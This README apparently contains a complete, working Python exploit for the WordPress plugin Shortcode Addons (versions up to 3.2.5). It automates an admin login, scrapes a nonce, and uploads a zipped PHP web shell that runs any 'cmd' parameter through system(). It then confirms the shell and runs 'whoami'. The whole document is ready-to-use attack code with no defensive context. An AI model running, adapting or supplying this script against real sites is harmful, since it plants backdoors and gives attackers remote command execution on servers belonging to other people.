README.md
Rendering markdown...
import requests
from bs4 import BeautifulSoup
import argparse
import os
import zipfile
import time
#Exploit By: Nxploited | Khaled Alenazi,
def create_session():
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
return session
def login(session, base_url, username, password, user_agent):
login_url = base_url + '/wp-login.php'
data = {
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log In'
}
headers = {'User-Agent': user_agent}
response = session.post(login_url, data=data, headers=headers)
for cookie in session.cookies:
if 'wordpress_logged_in' in cookie.name:
print("[+] Authentication successful.")
return True
print("[-] Authentication failed.")
return False
def extract_nonce(session, import_url, user_agent):
headers = {'User-Agent': user_agent}
response = session.get(import_url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
nonce_input = soup.find('input', {'name': '_wpnonce'})
if nonce_input:
print(f"[+] _wpnonce extracted: {nonce_input['value']}")
return nonce_input['value']
print("[-] _wpnonce not found.")
return None
def generate_payload(zip_name, php_name):
php_code = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
with open(php_name, 'w') as f:
f.write(php_code)
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.write(php_name)
print(f"[+] Payload {zip_name} created.")
def upload_payload(session, import_url, user_agent, nonce, zip_name):
files = {
'validuploaddata': (zip_name, open(zip_name, 'rb'), 'application/zip')
}
data = {
'_wpnonce': nonce,
'_wp_http_referer': '/wp-admin/admin.php?page=shortcode-addons-import',
'data-upload': 'Save'
}
headers = {
'User-Agent': user_agent,
'Referer': import_url
}
response = session.post(import_url, headers=headers, files=files, data=data)
if response.status_code == 200:
print("[+] Payload uploaded.")
return True
print("[-] Upload failed.")
return False
def confirm_shell(base_url):
shell_url = base_url + '/wp-content/uploads/shortcode-addons/nxploit.php'
time.sleep(3)
response = requests.get(shell_url, verify=False)
if response.status_code == 200:
print(f"[+] Shell is accessible at: {shell_url}")
return shell_url
print("[-] Shell not found.")
return None
def execute_command(shell_url):
cmd_url = shell_url + '?cmd=whoami'
response = requests.get(cmd_url, verify=False)
if response.status_code == 200:
print("[+] Command output:")
print("------------------")
print(response.text.strip())
print("------------------")
else:
print("[-] Failed to execute command.")
def cleanup(files):
for file in files:
if os.path.exists(file):
os.remove(file)
print("[+] Temporary files removed.")
def exploit():
parser = argparse.ArgumentParser(description="Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload # By:Nxploited | Khaled Alenazi,")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-un', '--username', required=True, help='Username')
parser.add_argument('-p', '--password', required=True, help='Password')
args = parser.parse_args()
base_url = args.url.rstrip('/')
import_url = base_url + '/wp-admin/admin.php?page=shortcode-addons-import'
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
session = create_session()
if not login(session, base_url, args.username, args.password, user_agent):
return
nonce = extract_nonce(session, import_url, user_agent)
if not nonce:
return
php_file = 'nxploit.php'
zip_file = 'nxploit.zip'
generate_payload(zip_file, php_file)
if not upload_payload(session, import_url, user_agent, nonce, zip_file):
cleanup([php_file, zip_file])
return
shell_url = confirm_shell(base_url)
if shell_url:
execute_command(shell_url)
cleanup([php_file, zip_file])
if __name__ == "__main__":
exploit()